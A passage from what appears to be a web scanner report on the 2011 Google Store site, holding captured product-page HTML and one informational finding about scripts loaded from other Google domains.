$("#multiple").bind("mouseleave", function(e){
$("#ProductImage").attr("src","/content/images/standard/10 56001a.jpg");
});
</script>

</td>
<td width="50%" valign="top" class="product_details">
<h2>Pack of 10 Recycled Paper Pencils</h2>
        <b>Item #:</b> 10 51006



<div class="p_desc">Boring old pencils get a snazzy new makeover with these Recycled Paper Pencils. Made from 50% recycled paper, they reveal a confetti-like tip when sharpened. Sharpening pencils has never been this fun. Really. Comes in a pack of 10 with a mix of navy, green, and red pencils with white Google logo on each pencil.</div>



        <div class="price">
<b>Price:</b> $3.00
</div>


<p class="inputblock">
<b>Qty: </b><input name="qty" type="text" value="1" size="1" style="width:20px;" maxlength="3" />

  <b>Inventory:</b> 496

</p>

<table><tr>
<td align="left">

<a href="http://www.googlestore.com/Office/cid=446/shop.axd/Category"><img src="/images/btn_continueshopping.gif" border=0></a>


  

<input name="imageField" id="submit_btn_reg" onclick="click('Add To Cart')" type="image" src="/images/btn_addtocart.gif" border="0">

</td></tr>
</table>

</td>
<td width="10"><img src="/images/spacer.gif" width="10" height="1" /></td>
</tr>

</form>
</table>

<br />
<b class="b_header">You may also like...</b>
<div id="cross_sells">
<ul>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Pack of 4 Google Ballpoint Pens : Pack of 10 Recycled Paper Pencils');" href="/Office/Pack+of+4+Google+Ballpoint+Pens.axd"><img src="/content/images/thumb/10-51106b.jpg" alt="Pack of 4 Google Ballpoint Pens" /></a>
<div class="price">
<b>Price:</b> $3.85
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Pack of 4 Google Ballpoint Pens : Pack of 10 Recycled Paper Pencils');" href="/Office/Pack+of+4+Google+Ballpoint+Pens.axd">Pack of 4 Google Ballpoint Pens</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Glow Barrel Pen : Pack of 10 Recycled Paper Pencils');" href="/Office/Glow+Barrel+Pen.axd"><img src="/content/images/thumb/go42058b.jpg" alt="Glow Barrel Pen" /></a>
<div class="price">
<b>Price:</b> $6.10
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Glow Barrel Pen : Pack of 10 Recycled Paper Pencils');" href="/Office/Glow+Barrel+Pen.axd">Glow Barrel Pen</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Scent-Sational Pencil : Pack of 10 Recycled Paper Pencils');" href="/Office/Scent-Sational+Pencil.axd"><img src="/images/products/dirs/10 51009/10-51009B.jpg" alt="Scent-Sational Pencil" /></a>
<div class="price">
<b>Price:</b> $0.80
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Scent-Sational Pencil : Pack of 10 Recycled Paper Pencils');" href="/Office/Scent-Sational+Pencil.axd">Scent-Sational Pencil</a>
</li>

</ul>
</div>

   </div>

   <img src="http://int.teracent.net/tase/int?adv=296&fmt=redir&sec=0&pid=prod&prodID=1051006" width="1" height="1" />
</div>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwL5t4CVDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (17)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '18930';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

4.6. http://www.googlestore.com/Office/Reversible+Neoprene+Laptop+Sleeve.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Office/Reversible+Neoprene+Laptop+Sleeve.axd

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /Office/Reversible+Neoprene+Laptop+Sleeve.axd HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?category=office
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.32.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28829
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:19:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Reversible Neoprene Laptop Sleeve</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav on" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_on.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a><ul class="item_list"><li><a href="/Office/Moon+Glow+USB+Hub.axd">Moon Glow USB Hub</a></li><li><a href="/Office/Gmail+Mousepad.axd">Gmail Mousepad</a></li><li><a href="/Office/Chrome+Mousepad.axd">Chrome Mousepad</a></li><li><a href="/Office/Compact+Journal.axd">Compact Journal</a></li><li><a href="/Office/Grinder+Brief+Bag.axd">Grinder Brief Bag</a></li><li><a href="/Office/Chrome+Notepad.axd">Chrome Notepad</a></li><li><a href="/Office/Mechanical+Colored+Pencil+Pack.axd">Mechanical Colored Pencil Pack</a></li><li><a href="/Office/Momentum+Computer+Portfolio.axd">Momentum Computer Portfolio</a></li><li><a href="/Office/Custom+Graphics+Apps+Pad.axd">Custom Graphics Apps Pad</a></li><li><a href="/Office/Android+Puffy+Print+Pen.axd">Android Puffy Print Pen</a></li><li><a href="/Office/Pack+of+10+Recycled+Paper+Pencils.axd">Pack of 10 Recycled Paper Pencils</a></li><li><a href="/Office/Scent-Sational+Pencil.axd">Scent-Sational Pencil</a></li><li><a href="/Office/Wide+Body+Clear+Pen.axd">Wide Body Clear Pen</a></li><li><a href="/Office/Summer+of+Love+II+Pens.axd">Summer of Love II Pens</a></li><li><a class="product_on" href="/Office/Reversible+Neoprene+Laptop+Sleeve.axd">Reversible Neoprene Laptop Sleeve</a></li><li><a href="/Office/Window+Ballpoint+Pen.axd">Window Ballpoint Pen</a></li><li><a href="/Office/Laptop+and+Cell+Phone+Stickers.axd">Laptop and Cell Phone Stickers</a></li><li><a href="/Office/Recycled+7+x+10+Journal.axd">Recycled 7" x 10" Journal</a></li><li><a href="/Office/5+x+7+Mod+Print+Notebook.axd">5" x 7" Mod Print Notebook</a></li><li><a href="/Kids/Android+Jotter.axd?cid=446">Android Jotter</a></li><li><a href="/Office/Vertex+Computer+Backpack.axd">Vertex Computer Backpack</a></li><li><a href="/Office/Timbuk2+Messenger+Bag.axd">Timbuk2 Messenger Bag</a></li><li><a href="/Office/Recycled+Checkpoint+Friendly+Computer+Bag.axd">Recycled Checkpoint Friendly Computer Bag</a></li><li><a href="/Office/Pack+of+4+Google+Ballpoint+Pens.axd">Pack of 4 Google Ballpoint Pens</a></li><li><a href="/Office/Glow+Barrel+Pen.axd">Glow Barrel Pen</a></li></ul></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="/js/addtl.js"></script>
<link rel="stylesheet" href="/css/popup.css" />

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>
<div id="product">

<h1>Office</h1>

<div id="breadcrumbs_only">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Office/">Office</a>
</div>
   <div id="product_info">

<script type="text/javascript" src="/js/style.js"></script>
<script type="text/javascript">
var styleProducts = new Array();
var styleDescriptions = new Array();

function addToWishList(frmName)
{
   var frm = document.forms[frmName];
   frm.action = '/shop.axd/AddToWishList';
   frm.submit();
}

function swatchImageClick(color)
{
   var fld = document.forms['frmProductDetails']['l1desc'];

   for(i = 0; i < fld.options.length; i++)
   {
       if (fld.options[i].value == color)
       {
           fld.selectedIndex = i;
           break;
       }
   }

   styleOnChange('frmProductDetails', '','10 55036 ', 1, 1, true);
}
</script>

<form action="/shop.axd/AddToCartBP" method="post" name="frmProductDetails">
<table border="0" cellpadding="10" cellspacing="0" width="100%" class="product_table">
<tr>
   <td valign="top" width="200">

<div id="product-image-wrap">
<a id="ProductImageHref" onclick="click('Enlarge Image')" style="text-decoration:none;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+55036%2f10-55036.jpg&edp_no=21283',420,600)">
<img id="ProductImage" width="225px" src="/images/products/dirs/10 55036/10-55036A.jpg" alt="" />
</a>

<div style="position:relative; overflow:hidden; width:215px">
<a style="float:left;" onclick="click('Enlarge Image')" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+55036%2f10-55036.jpg&edp_no=21283',420,600)" class="enlarge">Enlarge image</a>

</div>
</div>

<span class='mhead' style='background:#FFF;'>Mouseover image to view</span><ul id="multiple"><li><li><a style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+55036%2f10-55036.jpg&edp_no=21283',420,600)"><img style="border:1px solid #eee;" src='/images/products/dirs/10 55036/10-55036-BlueC.jpg' alt='' /></a></li><li><a style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+55036%2f10-55036.jpg&edp_no=21283',420,600)"><img style="border:1px solid #eee;" src='/images/products/dirs/10 55036/10-55036-GreenC.jpg' alt='' /></a></li><li><a style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+55036%2f10-55036.jpg&edp_no=21283',420,600)"><img style="border:1px solid #eee;" src='/images/products/dirs/10 55036/10-55036-RedC.jpg' alt='' /></a></li><li><a style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+55036%2f10-55036.jpg&edp_no=21283',420,600)"><img style="border:1px solid #eee;" src='/images/products/dirs/10 55036/10-55036C.jpg' alt='' /></a></li></li></ul>

<script type="text/javascript">

var mainSrc = $("#ProductImage").attr("src");
$("#multiple li a").bind("mouseenter", function(e){
$(this).css("border","1px solid #eee");
var ssrc = $(this).children("img").attr("src");
var inum = $(this).children("img").attr("id");
var medSrc = $("#i" + inum).attr("src");
if(medSrc == undefined){
medSrc = ssrc.replace("C.jpg","A.jpg");
}
$("#ProductImage").attr("src",medSrc);

});

$("#multiple li a").bind("mouseleave", function(e){
$(this).css("border","1px solid #FFF");
});

$("#multiple").bind("mouseleave", function(e){
$("#ProductImage").attr("src","/images/products/dirs/10 55036/10-55036A.jpg");
});
</script>

</td>
        <td valign="top" class="product_details">
<h2>Reversible Neoprene Laptop Sleeve</h2>
        <b>Item #:</b> 10 55036<br /><br />
<p class="blocktext">Tired of carrying around that bulky laptop bag? These reversible neoprene laptop sleeves protect your laptop and look great, too. The reversible design allows them to be used inside-out. They're also checkpoint-friendly for smooth sailing through airport security. Choose from red, blue, or green with a white logo on the front.  <SPAN class=black11 id=ctl00_content_ProductDescs_ctl01_Label1><B>Size : </B>15 "w x 11 h.  Fits up to a 15" laptop.</SPAN></p>

        <div class="price">
<b>Price:</b> $14.00
</div>







<div class="product_colors">
<b>Available Colors:</b><br />
<ul>

                        <li>
                        <a href="javascript:swatchImageClick('RED');void(0);"><img style="border:1px solid #CCC;" src="/images/catalog/swatch/RED.jpg" alt="RED" width="20" height="20" border="0"></a>
                           </li>

                        <li>
                        <a href="javascript:swatchImageClick('GREEN');void(0);"><img style="border:1px solid #CCC;" src="/images/catalog/swatch/GREEN.jpg" alt="GREEN" width="20" height="20" border="0"></a>
                           </li>

                        <li>
                        <a href="javascript:swatchImageClick('BLUE');void(0);"><img style="border:1px solid #CCC;" src="/images/catalog/swatch/BLUE.jpg" alt="BLUE" width="20" height="20" border="0"></a>
                           </li>

</ul>
</div>

<table cellpadding="0" cellspacing="0">
<tr>
            <td colspan="2">

<script type="text/javascript" src="/js/prototype/style.js"></script>
<script lang="javascript">
styleProducts['10 55036 '] = new Array();

styleProducts['10 55036 '][0] = new Array("RED","","", "$14.00" , "25", " In stock");

styleProducts['10 55036 '][1] = new Array("GREEN","","", "$14.00" , "82", " In stock");

styleProducts['10 55036 '][2] = new Array("BLUE","","", "$14.00" , "29", " In stock");

styleDescriptions['10 55036 '] = new Array();

styleDescriptions['10 55036 '][1] = 'Color';

</script>

<table cellpadding="0" cellspacing="0" id="style_controls">
<tr>

<td><b>Color</b></td>

<td><b>Qty</b></td>
</tr>
<tr>

<td><select id="" class="l1desc" name="l1desc" onchange="changeStyleMessage('frmProductDetails', 'l1desc','10 55036 ', 1, 1, true)">

<option id="10-55036-RD" value="RED" selected>RED - $14.00</option>

<option id="10-55036-GN" value="GREEN">GREEN - $14.00</option>

<option id="10-55036-BL" value="BLUE">BLUE - $14.00</option>

</select>
</td>

<td>
<select name="qty">

<option>0</option>

<option selected>1</option>

<option>2</option>

<option>3</option>

<option>4</option>

<option>5</option>

<option>6</option>

<option>7</option>

<option>8</option>

<option>9</option>

<option>10</option>

<option>11</option>

<option>12</option>

<option>13</option>

<option>14</option>

<option>15</option>

<option>16</option>

<option>17</option>

<option>18</option>

<option>19</option>

<option>20</option>

<option>21</option>

<option>22</option>

<option>23</option>

<option>24</option>

<option>25</option>

<option>26</option>

<option>27</option>

<option>28</option>

<option>29</option>

<option>30</option>

<option>31</option>

<option>32</option>

<option>33</option>

<option>34</option>

<option>35</option>

<option>36</option>

<option>37</option>

<option>38</option>

<option>39</option>

<option>40</option>

<option>41</option>

<option>42</option>

<option>43</option>

<option>44</option>

<option>45</option>

<option>46</option>

<option>47</option>

<option>48</option>

<option>49</option>

<option>50</option>

<option>51</option>

<option>52</option>

<option>53</option>

<option>54</option>

<option>55</option>

<option>56</option>

<option>57</option>

<option>58</option>

<option>59</option>

<option>60</option>

<option>61</option>

<option>62</option>

<option>63</option>

<option>64</option>

<option>65</option>

<option>66</option>

<option>67</option>

<option>68</option>

<option>69</option>

<option>70</option>

<option>71</option>

<option>72</option>

<option>73</option>

<option>74</option>

<option>75</option>

<option>76</option>

<option>77</option>

<option>78</option>

<option>79</option>

<option>80</option>

<option>81</option>

<option>82</option>

<option>83</option>

<option>84</option>

<option>85</option>

<option>86</option>

<option>87</option>

<option>88</option>

<option>89</option>

<option>90</option>

<option>91</option>

<option>92</option>

<option>93</option>

<option>94</option>

<option>95</option>

<option>96</option>

<option>97</option>

<option>98</option>

<option>99</option>

<option>100</option>

</select>
</td>
</tr>

<tr><td colspan="5"><span id="inventoryStatusMessage">
Select your Color/Size Combination
</span></td></tr>

</table>
<br /><br />

            </td>
        </tr>
        <tr>
            <td></td>
            <td>

<table cellpadding="0" cellspacing="0">
<tr>
<td align="left">

<a href="http://www.googlestore.com/Office/cid=446/shop.axd/Category"><img src="/images/btn_continueshopping.gif" border=0></a>


  

<input name="imageField" type="image" src="/images/btn_addtocart.gif" onclick="click('Add To Cart')" border="0" />

</td>
</tr>
</table>
</td>
</tr>
    </table>
   </td>
</tr>
</table>
   <input type="hidden" name="type" value="S">

<input type="hidden" name="cid" value="446">

<input type="hidden" name="style_id" value="10 55036 ">
<input type="hidden" name="edp_no" value="21283">

</form>

<br />
<b class="b_header">You may also like...</b>
<div id="cross_sells">
<ul>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Recycled Checkpoint Friendly Computer Bag : Reversible Neoprene Laptop Sleeve');" href="/Office/Recycled+Checkpoint+Friendly+Computer+Bag.axd"><img src="/images/products/dirs/10 41108/10-41108B.jpg" alt="Recycled Checkpoint Friendly Computer Bag" /></a>
<div class="price">
<b>Price:</b> $30.25
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Recycled Checkpoint Friendly Computer Bag : Reversible Neoprene Laptop Sleeve');" href="/Office/Recycled+Checkpoint+Friendly+Computer+Bag.axd">Recycled Checkpoint Friendly Computer Bag</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Timbuk2 Messenger Bag : Reversible Neoprene Laptop Sleeve');" href="/Office/Timbuk2+Messenger+Bag.axd"><img src="/content/images/thumb/10-41106b.jpg" alt="Timbuk2 Messenger Bag" /></a>
<div class="price">
<b>Price:</b> $157.75
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Timbuk2 Messenger Bag : Reversible Neoprene Laptop Sleeve');" href="/Office/Timbuk2+Messenger+Bag.axd">Timbuk2 Messenger Bag</a>
</li>

</ul>
</div>



   </div>

   <img src="http://int.teracent.net/tase/int?adv=296&fmt=redir&sec=0&pid=prod&prodID=1055036" width="1" height="1" />
</div>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwL5t4CVDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (8)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
